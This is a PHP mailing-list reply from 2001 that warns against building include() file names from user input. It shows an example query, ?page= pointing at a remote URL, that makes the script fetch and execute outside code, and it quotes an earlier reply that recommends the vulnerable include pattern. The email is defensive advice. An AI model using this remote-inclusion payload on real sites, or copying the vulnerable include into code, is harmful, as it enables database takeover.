Be very careful with this construct.  It is generally a bad idea to do any
sort of file opening/loading where the file name comes directly from user
input.

If you were naive enough to use this line:

include("$page.txt");

I could call your php script with ?page=http://mysite.com/dumpyourdatabase

PHP would then load and execute something like this:

http://mysite.com/dumpyourdatabase.txt

An entry could be added to the MySQL.User table from the code in this script
allowing remote access or many other things.

If you decide you really want something like this, it would be a great idea
to run a regular expression on $page and erase any non-letter characters.

Also, as a general reminder, make sure your database permissions are set up
properly for the MySQL user your database is running under (generally they
should not have access to the MySQL table, and only be allowed to
insert/select/update to the database the website works with).

Jon Snell

-----Original Message-----
From: Nick Norton [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, March 06, 2001 3:57 PM
To: [EMAIL PROTECTED]
Subject: RE: [PHP] Please Help!!!! - Really BASIC stuff!


Just put the following instead of a long switch and keep your file naming
conventions consistent

include("side_$page.txt");


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]

Reply via email to